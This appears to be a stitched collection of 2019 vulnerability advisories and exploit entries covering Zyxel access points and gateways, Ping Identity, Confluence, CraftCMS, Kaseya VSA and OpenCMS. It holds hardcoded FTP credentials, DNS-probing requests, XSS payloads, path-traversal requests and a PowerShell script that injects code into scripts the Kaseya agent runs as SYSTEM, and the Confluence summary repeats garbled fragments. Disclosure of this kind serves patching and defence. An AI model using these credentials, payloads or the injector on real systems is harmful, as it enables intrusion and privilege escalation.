SEC Consult Vulnerability Lab Security Advisory < 20190829-0 >
=======================================================================
              title: Hardcoded FTP Credentials
            product: Zyxel NWA/NAP/WAC wireless access point series
 vulnerable version: see "Vulnerable / tested version"
      fixed version: see "Solution"
         CVE number: -
             impact: medium
           homepage: https://www.zyxel.com
              found: 2019-06-19
                 by: Thomas Weber (Office Vienna)
                     IoT Inspector
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.

We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml



Business recommendation:
------------------------
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.


Vulnerability overview/description:
-----------------------------------
1) Hardcoded FTP Credentials
An FTP service runs on the Zyxel wireless access point that contains the
configuration file for the WiFi network. This FTP server can be accessed with
hardcoded credentials that are embedded in the firmware of the AP.
When the WiFi network is bound to another VLAN, an attacker can cross the
network by fetching the credentials from the FTP server.

The credentials were found by doing an automated scan with IoT Inspector.


Proof of concept:
-----------------
1) Hardcoded FTP Credentials
The username "devicehaecived" and the password "1234" can be used to access the
FTP server of the AP on port 21.

The content of the FTP server looks like the following listing:
-------------------------------------------------------------------------------
$ ls
cert  conf  debug  idp  packet_trace  script  tmp  wtp_image
-------------------------------------------------------------------------------
The directory "conf" contains all configuration files which store the WiFi
SSIDs and passphrases.


Vulnerable / tested versions:
-----------------------------
The following versions have been manually tested and were automatically
verified with IoT Inspector:
Zyxel NWA5121-NI    5.50 patch 0 and earlier
Zyxel NWA5121-N      5.50 patch 0 and earlier

The vendor provided the following list of affected devices:
Zyxel WAC6103D-I    5.50 patch 0 and earlier
Zyxel WAC6303D-S    5.50 patch 0 and earlier
Zyxel WAC6502D-E    5.50 patch 0 and earlier
Zyxel WAC6502D-S    5.50 patch 0 and earlier
Zyxel WAC6503D-S    5.50 patch 0 and earlier
Zyxel WAC6553D-E    5.50 patch 0 and earlier
Zyxel WAC6552D-S    5.50 patch 0 and earlier
Zyxel WAC5302D-S    5.50 patch 0 and earlier
Zyxel NWA5123-AC    5.50 patch 0 and earlier
Zyxel NWA5123-AC HD    5.50 patch 0 and earlier
Zyxel NWA5123-NI    5.50 patch 0 and earlier
Zyxel NWA5301-NJ    5.50 patch 0 and earlier
Zyxel NWA1302-AC    5.50 patch 0 and earlier
Zyxel NWA1123-ACv2    5.50 patch 0 and earlier
Zyxel NWA1123-AC HD    5.50 patch 0 and earlier
Zyxel NWA1123-AC PRO            5.50 patch 0 and earlier
Zyxel NAP102      5.50 patch 0 and earlier
Zyxel NAP203      5.50 patch 0 and earlier
Zyxel NAP303      5.50 patch 0 and earlier
Zyxel NAP353      5.50 patch 0 and earlier


Vendor contact timeline:
------------------------
2019-06-26: Contacting vendor through security@zyxel.com.tw.
2019-06-27: Vendor changed PGP key. Sent advisory with new key. Vendor
            confirmed receipt.
2019-07-03: Asked for an update; Vendor told that they just finished their
            investigation.
2019-07-09: Vendor provided a full list of devices that are prone to this
            vulnerability.
2019-07-23: Asked for a timeline; Vendor asked to shift the release of the
            advisory to 2019-08-29 in order to provide fixes; Shifted advisory
            release to this date.
2019-08-26: Asked for a status update; Vendor told that fixes are ready to be
            published at 2019-08-29.
2019-08-29: Coordinated advisory release.


Solution:
---------
Install the newest firmware for your device from the vendor's website
to fix this issue:

https://www.zyxel.com/support/download_landing.shtml

Additionally, the vendor provides the following security notice:
https://www.zyxel.com/support/hardcoded-FTP-credential-vulnerability-of-access-points.shtml


Workaround:
-----------
Restrict network access to the web interface.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2019

SEC Consult Vulnerability Lab Security Advisory < 20190829-1 >
=======================================================================
              title: External DNS Requests
            product: Zyxel USG/UAG/ATP/VPN/NXC series
 vulnerable version: see "Vulnerable / tested version"
      fixed version: see "Solution"
         CVE number: -
             impact: medium
           homepage: https://www.zyxel.com
              found: 2019-06-19
                 by: Thomas Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.

We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml



Business recommendation:
------------------------
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.


Vulnerability overview/description:
-----------------------------------
1) Information Disclosure via Unauthenticated External DNS Requests
A DNS request can be made by an unauthenticated attacker to either spam a DNS
service of a third party with requests that have a spoofed origin or probe
whether domain names are present on the internal network behind the firewall.


Proof of concept:
-----------------
1) Information Disclosure via Unauthenticated External DNS Requests
By sending the following POST request an attacker can probe for the domain
"subdomain.domain.com":
-------------------------------------------------------------------------------
POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

arip=subdomain.domain.com
-------------------------------------------------------------------------------

The following GET request can be used for the same purpose:
-------------------------------------------------------------------------------
GET /redirect.cgi?arip=subdomain.domain.com&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
-------------------------------------------------------------------------------

If the domain can be resolved, the response contains the resolved IP address
within the cookie value:
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2019 08:14:33 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Set-Cookie: arip=<IP-of-subdomain.domain.com>; path=/
Set-Cookie: zy_pc_browser=1; path=/
Connection: close
Content-Type: text/html
Content-Length: 9099

[...]
-------------------------------------------------------------------------------

If the domain cannot be resolved, a redirection will be returned:
-------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Mon, 24 Jun 2019 08:11:57 GMT
Location: ext-js/app/view/login/useraware.html
Content-Length: 220
Connection: close
Content-Type: text/html; charset=iso-8859-1

[...]
-------------------------------------------------------------------------------


Vulnerable / tested versions:
-----------------------------
The following versions have been tested, other versions might be affected as
well:
Zyxel USG110        ZLD 4.33
Zyxel USG210        ZLD 4.33
Zyxel USG310        ZLD 4.33
Zyxel USG1100       ZLD 4.33
Zyxel USG1900       ZLD 4.33
Zyxel USG2200-VPN   ZLD 4.33
Zyxel UAG2100       ZLD 4.18
Zyxel UAG4100       ZLD 4.18

The vendor provided the following list of affected devices:
Zyxel ATP200        ZLD4.33 patch 1 and earlier
Zyxel ATP500        ZLD4.33 patch 1 and earlier
Zyxel ATP800        ZLD4.33 patch 1 and earlier
Zyxel UAG2100       4.18 patch 1 and earlier
Zyxel UAG4100       4.18 patch 1 and earlier
Zyxel VPN50         SD-OS 10.02 and earlier
Zyxel VPN100        SD-OS 10.02 and earlier
Zyxel VPN300        SD-OS 10.02 and earlier
Zyxel USG20-VPN     ZLD4.33 and earlier
Zyxel USG20W-VPN    ZLD4.33 and earlier
Zyxel USG40         ZLD4.33 and earlier
Zyxel USG40W        ZLD4.33 and earlier
Zyxel USG60         ZLD4.33 and earlier
Zyxel USG60W        ZLD4.33 and earlier
Zyxel USG110        ZLD4.33 and earlier
Zyxel USG210        ZLD4.33 and earlier
Zyxel USG310        ZLD4.33 and earlier
Zyxel USG1100       ZLD4.33 and earlier
Zyxel USG1900       ZLD4.33 and earlier
Zyxel USG2200       ZLD4.33 and earlier
Zyxel NXC2500       5.40 and earlier
Zyxel NXC5500       5.40 and earlier
-------------------------------------------------------------------------------


Vendor contact timeline:
------------------------
2019-06-26: Contacting vendor through security@zyxel.com.tw.
2019-06-27: Vendor changed PGP key. Sent advisory with new key. Vendor
            confirmed receipt.
2019-07-03: Asked for an update; Vendor told that they just finished their
            investigation.
2019-07-09: Vendor provided a full list of devices that are prone to this
            vulnerability.
2019-07-23: Asked for a timeline; Vendor asked to shift the release of the
            advisory to 2019-08-29 in order to provide fixes; Shifted advisory
            release to this date.
2019-08-26: Asked for a status update; Vendor told that fixes are ready to be
            published at 2019-08-29.
2019-08-29: Coordinated advisory release.


Solution:
---------
Install the newest firmware for your device from the vendor's website
to fix this issue:

https://www.zyxel.com/support/download_landing.shtml

Additionally, the vendor provides the following security notice:
https://www.zyxel.com/support/web-CGI-vulnerability-of-gateways-and-access-point-controllers.shtml


Workaround:
-----------
Restrict network access to the web interface.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T.Weber / @2019

# Ping Identity Agentless Integration Kit Reflected Cross-site Scripting (XSS) #

Link: https://github.com/sbaresearch/advisories/tree/public/2019/SBA-ADV-20190305-01_Ping_Identity_Agentless_Integration_Kit_Reflected_XSS

## Vulnerability Overview ##

Ping Identity Agentless Integration Kit before 1.5 is susceptible to
Reflected Cross-site Scripting at the `/as/authorization.oauth2`
endpoint due to improper encoding of an arbitrarily submitted HTTP
GET parameter name.

* **Identifier**            : SBA-ADV-20190305-01
* **Type of Vulnerability** : Cross-site Scripting
* **Software/Product Name** : [Ping Identity Agentless Integration Kit](https://www.pingidentity.com/developer/en/resources/agentless-integration-kit-developers-guide.html)
* **Vendor**                : [Ping Identity](https://www.pingidentity.com/)
* **Affected Versions**     : < 1.5
* **Fixed in Version**      : 1.5
* **CVE ID**                : CVE-2019-13564
* **CVSSv3 Vector**         : AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
* **CVSSv3 Base Score**     : 6.1 (Medium)

## Vendor Description ##

> After authenticating the user (via a federated security token or
> authentication adapter), the user will be presented to the protected
> application via an SP adapter. This adapter provides the last-mile
> connection between the federation server (PingFederate) and the
> application, the user will be presented to the application which can
> then create a session and render the application for the
> authenticated user.

Source: <https://www.pingidentity.com/developer/en/resources/agentless-integration-kit-developers-guide/last-mile-integration.html>

## Impact ##

By exploiting the documented vulnerability, an attacker can execute
JavaScript code in a victim's browser within the origin of the target
site. This can be misused, for example, for phishing attacks by
displaying a fake login form in the context of the trusted site via
JavaScript and then sending the victim's credentials to the attacker.

## Vulnerability Description ##

The `/as/authorization.oauth2` endpoint of PingFederate takes several
HTTP GET parameter name-value pairs, which are subsequently rendered
as an HTML form with hidden input fields.

```text
https://idp.example.com/as/authorization.oauth2?response_type=code&client_id=CLIENT&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb
```

The name of the HTTP parameter is rendered as the `name` attribute of
the corresponding input field, and the HTTP parameter value is rendered
as the `value` attribute. The content of the `value` attribute is HTML-
encoded and therefore not susceptible to XSS. However, the content of
the `name` attribute is written to the HTML document without any
encoding or sanitization.

## Proof of Concept ##

An attacker can exploit this vulnerability by ending the HTML attribute
and element and then inserting, for example, a `script` tag.

```text
https://idp.example.com/as/authorization.oauth2?response_type=code&client_id=CLIENT&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb&%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E
```

The last parameter reads as follows when URL-decoded:

```html
"><script>alert(1)</script>
```

This leads to the following HTML response (shortened for readability):

```html
<form method="post" action="[...]">
<input type="hidden" name="REF" value="[...]"/>
<!-- ... -->
<input type="hidden" name=""><script>alert(1)</script>" value=""/>
<!-- ... -->
</form>
```

## Recommended Countermeasures ##

We recommend to HTML-encode the parameter name the same way the
parameter value is encoded.

## Timeline ##

* `2019-03-05` Identified the vulnerability in version < 1.5
* `2019-03-25` Contacted the vendor via support
* `2019-05-24` Finding review with Ping Identity and SBA Research
* `2019-07-11` Publication of CVE-2019-13564

## References ##

* [NIST NVD entry of CVE-2019-13564](https://nvd.nist.gov/vuln/detail/CVE-2019-13564)

## Credits ##

* Thomas Konrad ([SBA Research](https://www.sba-research.org/))

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

This email refers to the advisory found at
https://confluence.atlassian.com/x/uAsvOg .


CVE ID:

* CVE-2019-3394.


Product: Confluence Server.

Affected Confluence Server product versions:

6.1.0 <= version < 6.6.16
6.7.0 <= version < 6.13.7
6.14.0 <= version < 6.15.8


Fixed Confluence Server product versions:

* Confluence Server 6.6.16 has been released with a fix for this issue.
* Confluence Server 6.13.7 has been released with a fix for this issue.
* Confluence Server 6.15.8 has been released with a fix for this issue.


Summary:
This advisory discloses a critical severity security vulnerability. Versions of
Confluence Server This advisory discloses a critical severity security
vulnerability which was introduced in version 6.1.0 of Confluence Server.
Versions of Confluence Server and Confluence Data Center starting with 6.1.0
before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the fixed
version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for
6.15.x) are affected by this vulnerability. are affected by this vulnerability.



Customers who have upgraded Confluence Server to version 6.6.16 or 6.13.7 or
6.15.8 are not affected.

Customers who have downloaded and installed Confluence Server >= 6.1.0 but less
than 6.6.16 or who have downloaded and installed Confluence Server >= 6.7.0 but
less than 6.13.7 or who have downloaded and installed Confluence Server >=
6.14.0 but less than 6.15.8 please upgrade your Confluence Server installations
immediately to fix this vulnerability.



Local File Disclosure Vulnerability - CVE-2019-3394

Severity:
Atlassian rates the severity level of this vulnerability as critical, according
to the scale published in our Atlassian severity levels. The scale allows us to
rank the severity as critical, high, moderate or low.
This is our assessment and you should evaluate its applicability to your own IT
environment.


Description:

Confluence Server and Data Center had a local file disclosure vulnerability in
the page export function. A remote attacker who has Add Page space permission
would be able to read arbitrary files in
the <install-directory>/confluence/WEB-INF directory, which may contain
configuration files used for integrating with other services, potentially
leaking credentials, such as LDAP credentials, or other sensitive
information. The potential to leak LDAP credentials exists if LDAP
credentials are specified in an atlassian-user.xml file, which is a deprecated
method for configuring LDAP integration.
Versions of Confluence Server This advisory discloses a critical severity
security vulnerability which was introduced in version 6.1.0 of Confluence
Server. Versions of Confluence Server and Confluence Data Center starting with
6.1.0 before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the
fixed version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for
6.15.x) are affected by this vulnerability. are affected by this vulnerability.
This issue can be tracked at: https://jira.atlassian.com/browse/CONFSERVER-58734
.



Fix:

To address this issue, we've released the following versions containing a fix:

* Confluence Server version 6.6.16
* Confluence Server version 6.13.7
* Confluence Server version 6.15.8

Remediation:

Upgrade Confluence Server to version 6.15.8 or higher.

The vulnerabilities and fix versions are described above. If affected, you
should upgrade to the latest version immediately.




For a full description of the latest version of Confluence Server, see
the release notes found at
https://confluence.atlassian.com/display/DOC/Confluence+Release+Notes. You can
download the latest version of Confluence Server from the download centre found
at https://www.atlassian.com/software/confluence/download.



Support:
If you have questions or concerns regarding this advisory, please raise a
support request at https://support.atlassian.com/.


-----BEGIN PGP SIGNATURE-----

iQJLBAEBCAA1FiEEXh3qw5vbMx/VSutRJCCXorxSdqAFAl1prR8XHHNlY3VyaXR5
QGF0bGFzc2lhbi5jb20ACgkQJCCXorxSdqDY1w/+Pn9VU9IXsB+zK5qAnpcjeyIq
nGTUCw8Wxp1LLd8UAmBYGA6nuVtxjQrM4e/NIQRcFATrVwqOVOrYUheuuggrPjhq
O3AhcreWEPjsUM/8dSB/bOepy3o6C7XEXptsnCQe0Ia2Dgvh8FFln1xEtIhyL3zc
RqNSijYDw4od2MlGmJObWZPLuX0URmxInQy2WgD1NNXfvvXfZVPyraSJvRBlHxTA
fIPz0E30VE9VfKeCrK0wQvfMNFqkhuASXuJ6bPKDSWgXX0UCoEoU18++Kt1w/hz/
MWIZml4webwRx7hanHH0Rbg1WSy2KYXFgEFnyGanHu3xmBc3LthkVed0XQMaJjN5
tVSFnBUR142EBXKJjw5gIi9B0LSn3wVLpBjneBqJhsPA67Q9830CysbnLu93Ces3
p/V8rLOIBICLmr7F5MW0U8bUDObokmGIx2v1w5wROR7nsbtzMVqpFg31YnQ6EKms
4nvhV4C1BwdlHeN0wGvhwJH1IAKfR/Dm3/G17Stxc6fykw9RY4Cz7tpJraon7kUW
WLXxbVKSQ1ni7uvQzYE4dfDSxbDQe1asrahieHp5V9f38Zl7QD/dhgQMLN5xLUvv
GVR5bb2ThfNFh7fLBriEK+jB6DT+9a0t17eaQh42/4cERpBsZef5ubxgBHkUt63f
t/pe2Qj+HKZeGstVdyQ=
=Bt80
-----END PGP SIGNATURE-----

# Exploit Title : CraftCms Users information disclosure From uploaded File
# Author [Discovered By] : Mohammed Abdul Raheem
# Author's [Company Name] : TrekShield IT Solution
# Author [Exploit-db] : https://www.exploit-db.com/?author=9783
# Found Vulnerability On : 20-07-2019
# Vendor Homepage:https://craftcms.com/
# Software Information Link: https://github.com/craftcms/demo
# Software Affected Versions : CraftCms v2 before 2.7.10 and CraftCmsv3 before 3.2.6
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : Sensitive information disclosure
# CVE : CVE-2019-14280
####################################################################

# Description about Software :
***************************
Craft is a flexible, user-friendly CMS for creating custom digital
experiences on the web and beyond.

####################################################################

# Vulnerability Description :
*****************************

When a user uploads an image in CraftCMS, the uploaded image's EXIF
Geolocation Data does not gets stripped. As a result, anyone can get
sensitive information of CraftCMS's users like their Geolocation,
their Device information like Device Name, Version, Software &
Software version used etc.

# Impact :
***********

This vulnerability is CRITICAL and impacts all the craft's customer
base. This vulnerability violates the privacy of a User and shares
sensitive information of the user who uploads an image on CraftCMS.

# Steps To Validate :
*********************

1. Login to CraftCMS account.
2. Go to endpoint https://demo.craftcms.com/<token>/s/admin/assets
3. Upload an image which has EXIF Geolocation Data in it.
4. Once the image is uploaded by CraftCMS and hosted on the server,
download the image file and check the File Properties. You can also
use a tool like to view user's information: https://www.pic2map.com

# ATTACHED POC :
****************

https://youtu.be/s-fTdu8R3bU

# More Information Can be find here :
*************************************

https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#326---2019-07-23

###################################################################

# Discovered By Mohammed Abdul Raheem from TrekShield.com

# Exploit Title: Kaseya VSA agent <= 9.5 privilege escalation
# Google Dork: N/A
# Date: 2-09-2019
# Exploit Author: NF
# Vendor Homepage: https://www.kaseya.com/products/vsa/
# Software Link: https://www.kaseya.com/products/vsa/
# Version:  <= 9.5 agentmon.exe
# Tested on: Windows 10
# CVE : N/A


##Vulnerability##

This is not a new issue as such but more of the same in line with <a href="https://www.securityfocus.com/archive/1/541884/30/300/threaded">CVE-2017-12410</a> found by Filip Palian.
A a fix was put in place for the original CVE, however it was specific to binaries and not scripts.
The root cause for both issues is allowing a low privileged group excessive permissions to a folder used by a elevated process.

The Kaseya agent (agentmon.exe) runs as SYSTEM by default.
The agent also has a default working folder @ C:\kworking\
It will pull scripts and binaries to this folder and execute them from disk from the controlling web application.
By default the *Authenticated Users* group has all rights to this folder.

Scripts are written to disk however they are not checked for integrity prior to execution.
So a folder can be monitored for script files being dropped and then append malicious code prior to execution.

##Proof of concept##

This PowerShell script will monitor the default working directory.
When a ps1 script drops from a scheduled task or run from the VSA web application it will then append the command "Write-Host 'injected content'" which will run as SYSTEM.
Change the Write-Host command to the code to be executed or update the script to target other script drops such as vb script.

Note: To test you will need to sign up for a trial with VSA to have the ability to deploy an agent & schedule/run scripts

<--script start-->

      $folder = 'c:\kworking'
      $filter = '*.ps1'

      $filesystem = New-Object IO.FileSystemWatcher $folder, $filter -Property @{IncludeSubdirectories = $false;NotifyFilter =  [IO.NotifyFilters]'FileName, LastWrite'}

      Register-ObjectEvent $filesystem Created -SourceIdentifier FileCreated -Action {
          $path = $Event.SourceEventArgs.FullPath
"`nWrite-Host 'injected content'" | Out-File -Append -FilePath $path -Encoding utf8
          Unregister-Event FileCreated
      }

<--script end-->

##Timeline##

16-06-2019 :: Issue found
18-06-2019 :: security@ emailed requesting steps to disclose  
30-06-2019 :: CERT contacted due to non response of vendor from official email address
31-06-2019 :: CERT still unable to contact vendor
07-07-2019 :: CERT makes contact with vendor. Discover security@ address is not monitored by vendor
20-08-2019 :: Vendor confirms receipt of details
27-08-2019 :: Email sent indicating intention to disclose due to lack of response
02-09-2019 :: No response through CERT. Findings published

# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13237

For the tests, I used the payloads:
```
…%2f…%2fWEB-INF%2flogs%2fopencms.log
…%2f…%2fWEB-INF%2fweb.xml
```

1. Affected resource closelink:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com
enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
2. Affected resource closelink:
POC:
```
POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp
HTTP/1.1
Host: example.com
reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok
```
3. Affected resource closelink:
POC:
```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
4. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1
Host: example.com
versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
5. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1
Host: example.com
reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK
```


Extended POCs: https://aetsu.github.io/OpenCms

# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13236

1. In Site Management > New site (Stored XSS):
- Affected resource title.0:
POC:
```
POST /system/workplace/admin/sites/new.jsp HTTP/1.1
Host: example.com
title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se
```
2. In Treeview (Reflected XSS):
- Affected resource type:
POC:
```
http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=
</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=
```
3. In Workspace tools > Login message (Stored XSS):
- Affected resource message.0:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com
enabled.0=true&enabled.0.value=true&message.0=<svg
onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=
```
4. In Index sources > View index sources > New index source (Stored XSS):
- Affected resource name.0:
POC:
```
POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1
Host: example.com
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=
```
5. In Index sources > View field configuration > New field configuration
(Stored XSS):
- Affected resource name.0:
POC:
```
POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1
Host: example.com
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=
```
6. In Account Management > Impor/Export user data (Reflected XSS):
- Affected resource oufqn:
POC:
```
POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp
HTTP/1.1
Host: example.com
groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=
```
7. In Account Management > Group Management > New Group (Stored XSS):
- Affected resources name.0 and description.0:
POC:```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27
```
